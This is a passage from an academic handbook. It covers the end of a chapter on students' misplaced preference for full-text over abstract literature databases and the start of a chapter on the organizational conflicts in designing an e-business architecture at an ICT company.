about an assigned topic. Both full-text and abstract databases would be able to provide this information. However, the full-text database would be less useful for a complete literature review on an area because it would likely have only a subset, rather than all, of the necessary articles. This subset could easily miss major theoretical points or important empirical studies that can only be found in articles listed in the abstract database (Even if the full-text database is less useful, it is still likely easier to use.) It would be interesting to examine if students recognize when full-text databases are and are not useful, in other words, determining if students know how to correctly use this instructional technology. Additionally, it is not clear whether students are accurate in their beliefs of how useful full-text databases are. This chapter presents two studies that explore (1) whether students are accurate in their knowledge of usefulness of online databases, (2) why students prefer to use full-text databases, and (3) whether students recognize situations in which full-text databases are and are not useful.
STUDY 1 Bartsch and Tydlacka (2003) examined in spring 2002 whether important psychology articles were located physically in a medium-sized teaching university library and available online as a fulltext article through the same university. They also asked students (n = 81) taking research design and statistics classes to estimate what percentage of articles would be available both physically at the library and online as full-text documents. On average, students estimated 55% (SD = 28%) of important articles would be available physically at their teaching university and 61% (SD = 29%) would be available full-text online. In fact, 69%
of students believed they would be able to find just as many or more important articles in full-text databases than physically in the library. However, in actuality, only 9% of these important articles were available online, and 55% were available physically in the university library. Clearly, students did not have a good idea of what they could and could not find in full-text databases. The students in this study did not understand the low level of usefulness in full-text databases available at that time at their university. Additional data from this study give several other indications that students do not have a high level of knowledge about this instructional technology. The high standard deviations with the estimations indicate, overall, students did not have a good conception of how many articles could be found either physically at the library or online. Many students felt most journal articles would be available and many other students believed a small percentage would be available. In addition, students who stated they were more familiar with literature searches were marginally less accurate in their judgments (r = .22, p = .06). This result indicates students who believed they knew more about literature searches and the instructional technology related to it, actually did not know more, and possibly knew less.
STUDY 2 For the second study, not previously reported in the literature, I wanted to determine (1) whether abstract or full-text databases are perceived as higher in ease of use, perceived usefulness, and user acceptance, (2) which factors better predict user acceptance of abstract and full-text databases, and (3) whether the answers to the first two questions depend on the type of literature search that is needed.
1869
Misuse of Online Databases for Literature Searches
For this study, I surveyed 197 undergraduate and Master’s level students in research methods and statistics classes. Most of the participants (80%) were female, the majority was white (65%), and the average age of the student was 29. I collected data from these students using a selfreport survey. I manipulated one and measured four independent variables. The manipulated independent variable was the type of assignment given during the instructions. At the beginning of the survey after defining abstract and full-text databases, participants were asked to imagine they were either (1) to find an article on the theory of reasoned action and write a paragraph summary, (2) to find five important articles on the theory of reasoned action and write a 2-page literature review, or (3) to find approximately 30 articles and write a 15-20 page literature review on the current status of the theory of reasoned action. Participants received only one of the three scenarios and the scenarios were randomly assigned. The four measured variables included perceived usefulness (e.g., Abstract databases would help me make an A on this assignment), ease of use (e.g., For this assignment full-text databases would help me save time), social norms (e.g., My teachers would want me to use abstract databases for this assignment), and familiarity (e.g., I am familiar with full-text databases). Each of the measured variables was created from at least three questions based on questions from Davis (1989) and were rated on a 5-point strongly disagree-strongly agree Likert scale with higher scores indicating more agreement. These variables were measured separately for both abstract and full-text databases, creating a total of eight scaled measures. The dependent variable, user acceptance, was also measured by averaging three 5-point strongly agree-strongly disagree Likert questions. An example question was For this assignment, I
1870
would find most of my literature through full-text databases. Not surprisingly, user acceptance scores were higher for full-text databases (M = 4.26) compared to abstract databases (M = 3.28), p < .001. Additionally, full-text databases were rated as more useful (M = 3.93 vs. 2.97), easier to use (M = 3.99 vs. 3.09), having more positive social norms (M = 3.68 vs. 3.10), and more familiar (M = 4.15 vs. 3.45), all p’s < .001. As expected, students favored full-text databases, had more familiarity with them, and felt they were easier to use. In addition, they felt full-text databases were more useful and had greater approval from instructors. These last two perceptions, based on the literature, are likely incorrect. I then examined which variables correlated with user acceptance for both abstract and full-text databases. Overall, there were strong correlations between user acceptance and usefulness, ease of use, social norms, and familiarity for both abstract (all r’s > .40, all p’s < .001) and fulltext databases (all r’s > .40, all p’s < .001). Each measured factor predicted user acceptance. These include the three factors hypothesized in TAM and also familiarity. To determine which factors were most important to a student attempting to choose between abstract and full-text databases, I calculated the difference in user acceptance by subtracting the user acceptance score for abstract databases from the full-text score such that higher scores indicated greater user acceptance of full-text databases compared to abstract databases. A multiple regression was performed with the eight variables (usefulness, ease of use, social norms, and familiarity for both abstract and full-text databases) predicting favoritism in user acceptance. This analysis isolated the effect of each variable controlling for the other variables (Howell, 2002).
Misuse of Online Databases for Literature Searches
Results indicated perceived usefulness of the abstract databases had the strongest effect (β = -.36, p .10. Additionally, there were no significant differences between the three assignment condi-
tions on usefulness, ease of use, or social norms for either abstract or full-text databases, all p’s > .10. Students failed to perceive the differential usefulness of the abstract and full-text databases given different assignments. Students were not educated enough about the technology to recognize which database would be best for which assignment.
RECOMMENDATIONS FOR INSTRUCTORS Given the findings from these two studies, I provide some recommendations for instructors. These recommendations are based on the goal that at the end of their college career students should have information literacy. That is, students should have the ability to “recognize when information is needed and have the ability to locate, evaluate, and use effectively the needed information” (American Library Association, 1989). 1.
2.
Do not assume the students know how to correctly use technology for literature searches. Even if a student states they are familiar with tools for literature searches, the evidence presented here indicates they may not be aware of their knowledge level. Therefore, activities regarding this technology should not be optional. Students need to be familiar with the more useful but more difficult technology. Therefore, instructors should spend more time demonstrating how to use the abstract databases and less time demonstrating the full-text databases. Furthermore, it is recommended to create an assignment that forces the student to use the more useful but more difficult technology.
1871
Misuse of Online Databases for Literature Searches
3.
4.
In addition to showing how to use a technological tool, instructors should also discuss when it is appropriate and when it is not appropriate to use each technological tool. If students are tested over how to use each tool, then they should also be tested over when and when not to use that tool. Instructors should emphasize using abstract databases takes more time. Although the full-text databases are easier to use, abstract databases, which take more time, are often needed for the highest levels of quality.
FUTURE TRENDS Full-text databases may never become the sole place to find journal articles (Brooks, 2003) and will likely never replace libraries themselves (Mann, 2001). Nevertheless, in the future, full-text databases will become more complete and more will be available. Abstract databases will likely be less necessary and may only be needed for embargoed journals (Brooks, 2003). As full-text databases become more complete, more attention will be given to how to make these databases better (e.g., Bell, 2003). Hopefully, research will continue on how to better design full-text databases to increase ease of use and on providing better instruction to encourage quality use of this instructional technology.
CONCLUSION These studies demonstrate students were not accurate in their knowledge of usefulness of literature search databases and students did not recognize an online tool could be useful in one situation and not useful in another. In fact, it appears students substituted ease of use for use-
1872
fulness when thinking about this instructional technology. One goal of instructional technology is to make work easier or effortless for its users; however, users have to keep in mind ease of use does not equate to usefulness. Instructional technologists and teachers need to be aware of this type of advancement in technology in which the technology makes work easier but also reduces the quality of the work. Instructors must remember students may not have a good grasp of how to properly conduct literature searches. Although many students understand the basics, they do not know all the advantages and disadvantages of the instructional technology. Unfortunately, these students who understand the basics, may not realize what they do not know. These incorrect student beliefs, coupled with some instructors’ tendency to overestimate how much students know about the research process (Leckie, 1996; Valentine, 2001) and faculty’s incorrect belief that students have similar perceptions about instructional technology (Laskowski, 2002), can produce a critical lack of instruction about instructional technology. Although it is interesting to note students do not properly use online literature search databases, it is not the main message of this chapter. Rather the main message is any instructional technology can be misused by students who believe they are using the technology correctly. This chapter provides a concrete example of why there needs to be more training in information literacy, which includes not only how to use the current technology but also provides methods for how to determine when technology is or is not appropriate.
REFERENCES American Library Association. (1989). Presidential Committee on Information Literacy.
Misuse of Online Databases for Literature Searches
Final Report. Retrieved August 18, 2006, from http://www.ala.org/ala/acrl/acrlpubs/whitepapers/ presidential.htm Azjen, I., & Fishbein, M. (1980). Understanding attitudes and predicting social behavior. Englewood Cliffs, NJ: Prentice Hall. Bartsch, R. A., & Tydlacka, B. L. (2003). Student perceptions (and the reality) of percentage of journal articles found through full-text databases. Research Strategies, 19, 128-134. Bell, S. J. (2003). Is more always better? American Libraries, 34(1), 44-46. Brooks, S. (2003). Academic journal embargoes and full text databases. Library Quarterly, 73, 243-260. Carlson, S. (2001, November 16). The deserted library. The Chronicle of Higher Education, pp. A35-A38. Chapman, K. (2001). An examination of the usefulness of JSTOR to researchers in finance. Behavioral & Social Sciences Librarian, 19(2), 39-47. Davis, F. D. (1989). Perceived usefulness, perceived ease of use, and user acceptance of information technology. MIS Quarterly, 13, 319-339. Herlily, C. S. (2000). Internet sirens and the role of today’s librarians. Liberal Education, 86(3), 46-51. Herring, M. W. (2001). 10 reasons why the internet is no substitute for a library. American Libraries, 32(4), 76-78. Howell, D. C. (2002). Statistical methods for psychology (5th ed.) Pacific Grove, CA: Duxbury. Laskowski, M. S. (2001). The role of technology in research: Perspectives from students and
instructors. Portal: Libraries and the Academy, 2, 305-319. Leckie, G. J. (1996). Desperately seeking citations: Uncovering faculty assumptions about the undergraduate research process. Journal of Academic Librarianship, 22, 201-208. Littrell, L. (2000). Bibliographic instruction: Not just for students? College and Research Libraries, 61, 396-398. MacDonald, B., & Dunkelberger, R. (2000). Fulltext database dependency: An emerging trend among undergraduate library users? Research Strategies, 16, 301-307. Mann, T. (2001). The importance of books, free access, and libraries as places--and the dangerous inadequacy of the information science paradigm. Journal of Academic Librarianship, 27, 268-281. Valentine, B. (2001). The legitimate effort in research papers: Student commitment versus faculty expectations. Journal of Academic Librarianship, 27, 107-115. Venketesh, V., & Morris, M. G. (2000). Why don’t men ever stop to ask for directions? Gender, social influence, and their role in technology acceptance and usage behavior. MIS Quarterly, 24, 115-139.
KEY TERMS Abstract Databases: Online literature search databases that have large numbers of abstracts with some full-text articles. Ease of Use: Amount of effort needed to meet a goal using a particular technology.
1873
Misuse of Online Databases for Literature Searches
Full-Text Databases: Online literature search databases in which each article indexed is present in its entirety.
Technology Acceptance Model: Describes factors that predict user acceptance of technology.
Online Literature Search Databases: Internet-based tool that helps find journal articles.
Usefulness: Quality of output when using a particular technology.
Subjective Norms: Social rules for how people should and should not use technology.
This work was previously published in Handbook of Research on Instructional Systems and Technology, edited by T. Kidd and H. Song, pp. 373-380, copyright 2008 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
1874
Section VI
Managerial Impact
This section presents contemporary coverage of the managerial implications of database technology. Particular contributions address e-services, database grids, and project databases. The managerial research provided in this section allows executives, practitioners, and researchers to gain a better sense of how database technology can inform their practices and behavior.
1876
Chapter 6.1
Conflicts, Compromises, and Political Decisions: Methodological Challenges of Enterprise-Wide E-Business Architecture Creation Kari Smolander Lappeenranta University of Technology, Finland Matti Rossi Helsinki School of Economics, Finland
ABSTRACT This chapter describes the architecture development process in an international ICT company, which is building a comprehensive e-business system for its customers. The implementation includes the integration of data and legacy systems from independent business units and the construction of a uniform Web-based customer interface. We followed the early process of architecture analysis and definition over a year. The research focuses on the creation of e-business architecture and observes that instead of guided by a prescribed method, the architecture emerges through somewhat non-deliberate actions obliged by the situation and its constraints,
conflicts, compromises, and political decisions. The interview-based qualitative data is analyzed using grounded theory and a coherent story explaining the situation and its forces is extracted. Conclusions are drawn from the observations and possibilities and weaknesses of the support that UML and RUP provide for the process are pointed out.
INTRODUCTION Robust technical architecture is considered one of the key issues when building successful e-business systems. The design of technical architecture is usually seen as a set of trade-offs between avail-
able resources (such as available personnel and money) and operational requirements related to technical architecture, such as scalability, capacity, response times, security, and availability. The software architecture research provides design tools for technical architecture design, including, for instance, architecture description languages (Dashofy, Van der Hoek, & Taylor, 2005; Medvidovic & Taylor, 2000), common architectural patterns and styles (Monroe, Kompanek, Melton, & Garlan, 1997), architectural trade-off methods (Kazman, Klein, & Clements, 2000), architectural frameworks (Leist & Zellner, 2006), and technologies for e-business implementation (Bichler, Segev, & Zhao, 1998). In an ideal world, the work of an architect would be to find the explicit requirements for architecture, and select the best possible design tools and technologies to implement the architecture. Furthermore, the architecture development team would make rational trade-offs concerning the requirements, and produce the best realistic solution for the architecture with the selected design tools and implementation technologies. However, the literature contains many examples of cases where technical rationality has not been sufficient for the success in IS projects (e.g. Sauer, Southon, & Dampney, 1997). Architecture researchers have found that the work of an architect and the usage of architecture are bound by more diverse organizational issues and limitations that the classical technical software architecture research ignores. These include for example the diverse role of an architect in an organization observed by Grinter (1999) and varying uses and meanings of architecture in practice (Smolander & Päivärinta, 2002a). The main message of these studies is that an architect has a social, and even political, role in an organization and that different stakeholders relate different meanings to architecture to fulfill their informational requirements in the development process. This phenomenon has remarkable similarities to information systems development in general. As pointed out by
Klein & Hirscheim, the implicit assumption of rationality of the development processes hides the legitimating of the goals and differing political agendas of various stakeholders (Hirschheim & Klein, 1989). To understand the issues involved in architecture development, we observed a project that was developing e-business architecture in an international ICT company. We interviewed various stakeholders to gain a deep insight into the process. The company already had several e-commerce systems in individual business units, but it needed a more uniform customer interface for its various systems. The e-business project included the integration of data and legacy systems from these units and the construction of a uniform Web-based customer interface hiding the differences of the business units. Our goal was to find ways for supporting architecture development by means of methods and description languages, such as UML. We were aware of efforts of supporting architecture design with UML (e.g., Conallen, 1999; Garlan & Kompanek, 2000; Hofmeister, Nord, & Soni, 1999b; Object Management Group, 1999, 2006), but these efforts were mostly targeted to technical software design and we did not know how well these would support a large socio-technical or organizational project, such as enterprise or e-business architecture development. Therefore we decided to observe a real world project and concentrate on the requirements that e-business architecture development in its complex organizational context state on description languages and development methods. Next, we decided to compare the observed requirements to the support that UML and RUP offer, because they, together, form the current methodological basis for many systems development organizations. UML is the de-facto standard language in software and systems development and RUP (Jacobson, Booch, & Rumbaugh, 1999) is a widely known process model that claims to improve development process maturity (Kuntzmann & Kruchten, 2003). We believed that this kind of knowledge would
1877
Conflicts, Compromises, and Political Decisions
benefit both practitioners in process improvement and developers of UML extensions. Another interest was to find out what factors influenced the creation of e-business architecture: was it designed purposefully by software architects through rational decisions and trade-offs, or did it emerge through somewhat non-deliberate actions obliged by the situation and its constraints, conflicts, compromises, and political decisions? This is a very important issue, as unlike software architecture, e-business architecture is very tightly coupled with the business models of the company and thus the architecture has a far more direct impact on business than for example low-level system architecture. Furthermore, if the business models are not supported by the e-business architecture, then the business strategy will not work (Ross, Weill, & Robertson, 2006). We used open interviews of various actors in the projects to gather the necessary information about the project. We analyzed the qualitative data from the interviews using grounded theory (Glaser & Strauss, 1967) as the research method and concluded the analysis by categorizing the issues that had emerged using the taxonomy of Lyytinen (1987). Thus, we classified the issues as belonging into technical, language and organizational context. From this classification of issues, we extracted requirements for development methods when developing integrated e-business solutions and compared these requirements to the support that the combination of UML and RUP provides. We observed that most of the problems encountered had very little to do with descriptions of the architecture per se. Rather what was problematic were the issues that architecture development exposed about the underlying organization. This is an important finding, as most of the research into architecture has been about effective description languages and design processes and there is a void of research about the organizational consequences of architecture development.
1878
The article is organized as follows: we start by explaining in more detail what is meant by architecture in this article (section 2). In section 3, we describe the research process and method used. section 4 describes the situation the company is facing and the motives for the change and implementation of the e-business system. In section 5, we describe the situation and the context of the development project aiming at e-business implementation and the consequences of the situation for the progress of the development project. From the observed issues faced by the development project we draw conclusions and extract the requirements for development methods in e-business architecture development and compare the requirements to support that the combination of UML and RUP provides (section 6). We point out areas where current research is not supporting the needs of the practice of general and particularly e-business architecture development.
ARCHITECTURE IN SYSTEMS DEVELOPMENT In this study, we describe a process where comprehensive e-business architecture is being created. In addition to e-commerce systems serving external customer transactions, e-business includes both the integration of and streamlining of internal information systems to serve the new digitally enabled business processes (Kalakota & Robinson, 2001) and the unified customer interface (Ross et al., 2006). For the sake of simplicity, we understand e-business here to cover both the transactions and processes within a firm and the integrated external e-commerce systems as in (Kalakota & Robinson, 2001). This enables us to interpret the process in the studied organization as the process of building an integrated e-business architecture. Ross et al. (2006) stress the architecture as the necessary foundation for execution of comprehensive, across the functions operating, e-business.
Conflicts, Compromises, and Political Decisions
Conventionally, architecture is understood as a high-level logical abstraction of the system defining the main components of the system and their relationships. The term architecture is also used both in the context of an individual system and in the context of systems integration. The software architecture typically concentrates on the architecture of a single software system, whereas the terms information systems (IS) architecture and enterprise architecture (Kim & Everest, 1994; Ross et al., 2006; Sowa & Zachman, 1992) refer to the overall architecture of all information systems in an organization. In practice, however, the borderline between a single system and a set of systems is difficult to determine. Practically no system today is isolated from other systems, and the relationship of a system to its environment may be architecturally more important than the inner structure of the system, especially when developing e-business systems. Usually, systems rely on a common technical infrastructure, (including networks, processing services, operation services, etc.) which is common for all the systems in an organization. Organizationally, architecture design is a co-operative effort involving many roles in the development environment. These roles include the role of an architect who is specifically associated with the task of architecture design. An architect needs contribution and commitment from many individuals, teams, and parts of organization to succeed in the effort (Grinter, 1999). By architecture development, we mean a process where early design decisions are realized into an architecture defining that defines system’s composition from various viewpoints. Architecture also contains the blueprints for system’s implementation from conceptual and physical components. This process forms a set of documents which different stakeholders can use to relate their concerns to the issues made concrete by the architecture and discuss their needs in the terms defined by the common architecture. They can also make decisions concerning system devel-
opment strategies and policies using architecture as a common reference. This conception sees architecture not only as a technical artifact but also as a boundary object (Star & Griesemer, 1989) having strong organizational connotations. The conventional role of architecture is to serve as an enabler for further design and implementation (Hofmeister, Nord, & Soni, 1999a; Shaw & Garlan, 1996). Obviously, sound and well-designed technical architecture makes the detailed design and implementation of a system easier and less risky than it would be without such architecture. Architecture defines, for example, the modules or components which the system is composed of, and therefore it focuses and constrains the solution space of individual designers that develop individual components. This technical view of architecture has produced also studies related to UML. In the end of last decade, possibilities and weaknesses of UML as an architecture description language, and its complexity ( Siau & Cao, 2001; Siau, Erickson, & Lee, 2005) were widely evaluated and enhancements were proposed (Conallen, 1999; D’Souza & Wills, 1998; Egyed & Medvidovic, 1999; Garlan & Kompanek, 2000; Hofmeister et al., 1999b; Medvidovic, Egyed, & Rosenblum, 1999; Rumpe, Schoenmakers, Radermacher, & Schürr, 1999). The recent developments in this area include the SysML extension of UML (Object Management Group, 2006). Different profiles and enhancements to UML have been proposed to tackle its limitations in electronic commerce (Dori, 2001).
RESEARCH PROCESS The studied organization is a globally operating ICT company having thousands of employees worldwide. Its customers include both consumers and businesses for which the organization provides various products and services. Software is one of the key assets in the organization’s service produc-
1879
Conflicts, Compromises, and Political Decisions
tion and product development. Historically, the organization has had several independent business units targeted at diverging business sectors. In addition, the information management of the organization has been distributed to these business units and the functions of enterprise level information management have included mainly the provision of network infrastructure, enterprise level accounting, and basic office tools. Most of the information systems in use have been implemented and operated by the business units that have been quite independent in their decisions concerning strategies for information management. However, recent developments in markets and technology have led the organization to set its strategies to a more integrative direction. For this reason, the organization has set an objective to provide an integrated e-business solution to both its consumer and business customers. This will include both implementation of a uniform Web-based customer interface and sufficient integration between the distributed operative back-end information systems, such as customer management and billing systems. The research process followed the grounded theory method (Glaser & Strauss, 1967), which is
a research method developed originally for social sciences by Glaser and Strauss in the 1960s and later developed and re-interpreted by the original authors (e.g., Glaser, 1978; Strauss & Corbin, 1990) and others (e.g., Locke, 2001; Martin & Turner, 1986). Grounded theory promotes inductive theory creation from the data. The objective is not to validate or test theories but to create one. The analysis process of the grounded theory is explicitly defined and consists of several coding phases. The coding starts from open coding in which any incident, slice, or element of the data may be given a conceptual label for the identification of commonalities. These commonalities are called categories and they are described in terms of their properties (Fernández, Lehmann, & Underwood, 2002). The coding continues with axial coding (Strauss & Corbin, 1990) or theoretical coding (Glaser, 1978), where relationships between the categories are resolved. The coding ends at selective coding (Strauss & Corbin, 1990) where the resulting theory is “densified” (Glaser, 1978) or a core category selected (Strauss & Corbin, 1990) and theory about that is described. The data collection is based on the notion of theoretical sampling, which means adjusting the
Table 1. Interviewed persons and their roles Role
1880
Tasks
Interviews
System architect
Deals with technological solutions and architectural structures in the e-business development project
6
Enterprise system manager
Is responsible for a portfolio of systems and technologies that are used in a particular organization. Acts as a customer in the internal e-business development project or participates it as an expert.
5
Project manager
Manages resources and is responsible for the execution of a subproject of the e-business development project
3
Software development manager
Is responsible for a permanent software development organization
2
Project leader
Manages the e-business development super-project and supervises its set of sub-projects.
1
System analyst
Participates the requirements gathering and analysis phases as an intermediate between customers and technical experts.
1
Marketing manager
Is responsible for the public image and services of the electronic channel. Requirements setter and a customer to the development project.
1
Conflicts, Compromises, and Political Decisions
data collection process according to the requirements of the emerging theory. The sources of data may be adjusted during the process and the data collection can be stopped whenever a state of theoretical saturation is achieved, meaning a situation where no additional data would further develop the categories and their properties. In the study, we interviewed 19 participants of the ongoing e-business system architecture design project during 2002, first in January and February and then later in November and December. The interviewees included six system architects, five enterprise system managers, three project managers, two software development managers, one project leader, one system analyst, and one marketing manager. Table 1 describes their relationship to the e-business development project. The interviews lasted from 45 to 120 minutes and they were completely transcribed as text. The interview themes of this study were adjusted during the data collection to reflect better the developing theoretical understanding of the researchers and the specific knowledge of the interviewees. The emphasis of the interviews changed according to the interviewee and the special knowledge in his or her possession. Because the data collection proceeded partly in parallel with the analysis, the emerging theory also caused changes in the emphasis of the interview themes. In grounded theory this kind of adaptation is called theoretical sensitivity, and for theory-building research this is considered legitimate because “investigators are trying to understand each case individually and in as much depth as feasible” (Eisenhardt, 1989, p. 539). Eisenhardt calls the process where the emergence of a new line of thinking causes the altering of data collection controlled opportunism “in which researchers take advantage of the uniqueness of a specific case and the emergence of new themes to improve resultant theory” (Eisenhardt, 1989, p. 539). The analysis in this study started with the open coding phase. In the beginning, we did not have any explicit a priori constructs for the analysis.
Our task was to search mentions from the interviews that could be interpreted as meaningful related to the research question, “What are the conditions and constraints for creating and designing architecture in a large information systems development project?” The identified mentions related to this question were categorized using the software tool ATLAS.ti. During the open coding phase, altogether 187 emergent categories were found, and the categories were assigned to emerging scheme of super categories or category families, including for instance changes, conflicts, consequences, experiences, problems, purposes, and solutions occurring during the e-business architecture design and implementation process. The axial coding started in parallel with the open coding and causal relationships between categories were recorded with Atlas.ti’s semantic network capability. Figure 1 shows an example of such a network diagram. In the figure, the boxes represent categories, the arrows between them interpreted causalities, and the lines associations between categories. The number of categories and the number of identified relationships between the categories added up to 187 categories and 200 relationships, which created a problem of how to report such a multitude of categories and relationships. The solution was sought through abstracting out those categories that were rarely occurring in the data and interpreted as not so relevant regarding the research question. In addition, more attention was paid to those categories that occurred frequently in the data. Inductively, we produced an explaining story to the events and forces under which the e-business development project had to work. The organization is facing market changes and changing the organization according to the changing markets. The objectives for the e-business development emerge from these changes and because the change is continuous and it brings all the time new requirements for the e-business system, the objectives are quite fluctuating. In addition, the history and legacy structures of the organization
1881
Conflicts, Compromises, and Political Decisions
cause conflicts and problems in the development when combined with the need for change. These fluctuating objectives and emerging conflicts and problems brought certain consequences to the e-business architecture development in the organization. The formation and description of this explaining story can be considered as selective coding (Strauss & Corbin, 1990) and its details in the studied organization are explained in the next three sections. The study has required extensive interpretation and exploration in the studied organization and therefore the main instruments of the research has been the researchers and their ability to interpret events and people’s actions correctly. Robson (2002) lists three threats to validity in this kind of research, reactivity (the interference of the researcher’s presence), researcher bias, and respondent bias, and strategies that reduce these threats. We have used these strategies in the following way: •
•
•
1882
Prolonged involvement: Although this study lasted for one year, the research project altogether lasted for more than two years in the same organization and consisted of several phases and data collection rounds. Triangulation: The study has used data and observer triangulation as presented by Denzin (1978). To reduce the bias caused by researchers, we used observer triangulation, because the data collection was done by two researchers. The bias caused by data was minimized using data triangulation, where different sources of data were used. Interviews were the primary data collection method, but we also received many kinds of project and company documents and architecture descriptions. Peer debriefing and support: The research has included regular meetings and discussions with involved research participants from several research institutions. In addition, preliminary results of research phases
•
•
have been presented and discussed in conferences and workshops (Smolander, 2003; Smolander, Hoikka, Isokallio et al., 2002; Smolander & Päivärinta, 2002a, 2002b; Smolander, Rossi, & Purao, 2002, 2005). Member checking: The interpretation of the data has been confirmed by presenting the results to company participants in the research project. Audit trail: All interviews have been recorded and transcribed. The notes and memos of the study have been preserved and data coding and analysis results are available through the analysis tool used, ATLAS.ti.
CHANGES AND THEIR EFFECTS IN THE DEVELOPMENT CONTEXT Starting Point: Changing Markets, Changing Organization During the time of the data collection, there was a considerable change going on in the ICT market and the organization under study had undergone a deep change. A few years ago, the strategies emphasized growth and utilization of the possibilities in the stock market. This enforced independent business units inside the organization since the growth was easier to handle through independency. Each of the business units built independent e-commerce solutions and customer extranets, which resulted to a fragmentary set of e-commerce solutions to customers with own Internet sites, sales and billing systems, and Webbased customer support. When the beliefs in the possibilities of ICT sector’s continuing growth diminished, the organization had to change its strategies from growth to profitability and from stock market to customer orientation. With independent business units, there was no authority in the organization, which would see a customer as a whole. Instead, each business unit kept track of the customers only in
=>
=>
Consequense: minimal solution
Problem: unclear project financing =>
Problem: unclear project organization
=>
=>
=>
=>
=>
=>
=>
Consequence: no “grand plan”
=>
==
=>
=>
Conflict: different personnel profile between business units
==
=>
=>
=>
Problem: creating common understanding
=>
Conflict: different requirements between business units
Conflict: different legacy systems == ~Problem: unclear objectives
=>
Problem: unclear benefits
Conflict: different histories of business units
=>
=>
=>
=>
Solution: make decisions at low level
Solution: team building
=>
Problem: emergent architecture
=>
=>
Consequence: forced decisions
==
=>
Conflict: high-level vs. low-level decisions
Problem: making agreements about rules and objectives
Problem: tight schedule
=>
Problem: decision making
==
Consequence: limited design
~Problem: avoiding conflicts
=>
Experience: independent businesses
Conflicts, Compromises, and Political Decisions
Figure 1. An example of a semantic network from axial coding
1883
Conflicts, Compromises, and Political Decisions
the context of its independent business. To produce a unified customer interface a profound change to the way of building information systems and an integrated e-business solution was needed. This change would also require changes in business practices and organization. The organization should operate in a more integrated fashion and the barriers between independent units should be lowered. The organization began to see technical e-business architecture as an enabler of change. The IS organizations in independent business units were obliged to cooperate and enforce commitment to the integration of information systems. This also emphasized the role of central information management, which had been in a minor role this far. Now, its roles would include the enforcement of information systems integration and enabling the unification of the sales channels and customer management for the planned e-business solution. At this point, the organization decided to establish a working group of systems architects from various parts of the organization. In the following section, we shall describe the context and the forces under which this group of architects were developing and designing the unified e-business architecture.
Conflicts, Problems and Varying Purposes The context for e-business architecture development included many issues, which the working group for technical architecture development had to face and be aware of. These included the market changes as described above, historical organizational inertia, fluctuating requirements and objectives, and conflicts and problems emerging from the market changes, inertia, and unclear objectives.
Historical Inertia The organization’s history with independent businesses and their diverging functions and 1884
objectives had both psychological and technical consequences causing slow progress and conflicts in the integrated e-business development. Each of the business units had legacy systems with incompatible information structures, technical architectures, and operating principles. It was not possible in practice to replace these systems with a uniform solution at once. The historical inertia had effects also on the organization responsible for information management and information systems. Because of the independence, the organization had no clear central information management that could take responsibility of the e-business architecture development. Many of the conflicts and problems described later arose from this situation.
The Observed Objectives for the E-Business System The fluctuating objectives, meanings, and requirements for the e-business architecture created another source of conflicts and problems. In a large organization with a high degree of independency, the conceptions among different business units and individuals about the purposes of an e-business solution vary considerably. Among the interviewees, we identified a large set of different purposes for the e-business system, which were then classified in five distinct classes: • • • • •
Creation of a unified electronic customer interface. Reduction of costs. Integration of information systems. Gaining business advantage. Implementing an organization change.
This list of observed purposes for the e-business system looks quite comprehensive and ambitious. Different interviewees emphasized the purposes differently and many saw that the only realistic objective was to implement a single sign-on procedure with a minimal level of cus-
Conflicts, Compromises, and Political Decisions
tomer information integration. The list anyhow shows the complicated and conflicting nature of objectives for the e-business system when it is developed for a large enterprise.
Emerging Conflicts and Problems Changes in markets and organization, the history of the organization, and the complicated objectives for the e-business system put the architecture development group in a difficult situation. The group and its members were obliged to respond by some means and these responses shaped mitigated the role of deliberate design in the development process. In open coding, we identified in total 48 categories of conflicts and problems. This list was further combined to seven main categories, as follows: • • • •
• • •
Varying requirements and unclear objectives Problems in the cooperation between technical and business people Conflict avoidance and problems in decision-making Problematic role of the central information management and its missing working practices Difficulties in creating common understanding about the architecture Difficulties in determining the level of integration Problems of implementing the integration
As described earlier, the purposes of the system were manifold and complicated and the requirements varied according to the business needs in the business units. The architects held this ambiguity of objectives and requirements as the biggest obstacle in the development. Those in the managerial level recognized the problem as well, but explained it as unavoidable in the situation and expected that the first prototypes of the system will bring more clarity to the objectives. This resembles
the chicken-egg problem: architects must know well the objectives to design the architecture, but the objectives are further clarified only after the first version of the architecture is built. There were several mentions about the problems in the cooperation between technical and business people. Architects expected the business managers to explicate clear requirements and objectives for the system and its architecture. However, they considered the task impossible, because they thought that the business managers do not possess enough understanding about the possibilities of current technology. They felt that this leads to unrealistic objectives, which were manifested especially when considering the possibilities of legacy systems integration: people with business background had far more optimistic views than architects. Conflict avoidance and problems in decisionmaking slowed the progress. Again, because of the history of independency, a central authority that could take care of the architectural decisions for the integrated e-business solution was missing. Because nobody took a full responsibility of the situation, this led to avoidance of conflicts and enforced the tendency towards compromises. A frequently occurring phrase among the architects included the term “lowest common denominator,” which was usually noting to the compromised solution with a single sign-on procedure and a minimal level of customer information integration. The role of the central information management was unclear and it was lacking the routine of large development efforts. The independency of businesses and the minor role of central information management had implications on the working practices. The architectural and development practices of the business units contained considerable differences implying that also common working practices needed to be established for the development process of the e-business system. Even the understanding of the designed architecture and related technical solutions were difficult to communicate across the organiza-
1885
Conflicts, Compromises, and Political Decisions
tion. Since the business units have had their own histories and produced their own legacy systems and information architectures, the interpretations on the situation and objectives diverged. This, combined with changing organization, unclear objectives, and missing common working practices, created difficulties in understanding and transferring architectural knowledge between the participants from different business units. It was also difficult to determine the level of integration between the systems. The ownership of the information becomes an issue even in the most modest single sign-on e-business solution serving the whole organization. The question becomes, “who owns the customer information?” and relates to determining the integration level to the currently independent back-end legacy systems. The more ambitious integration, the more out-of-control the customer information (and possibly other information too) shifts from the business units. In addition to determining the integration level, the actual implementation of integration proved to be problematic. Since the diverging legacy systems could not be replaced, they all had to be interfaced. Of the seven conflicts and problems occurring when creating e-business architecture, only the problem of implementing the integration was mainly a technical problem. The others were more related to the change in organization and practices that happen when developing an e-business system in a large organization with independent businesses. In the following, we shall look closer on what consequences these conflicts and problems cause for the architecture design and development process.
CONSEQUENCES: LIMITED DESIGNS AND MINIMAL SOLUTIONS In the beginning of the project a unified architecture was seen as a panacea for solving the
1886
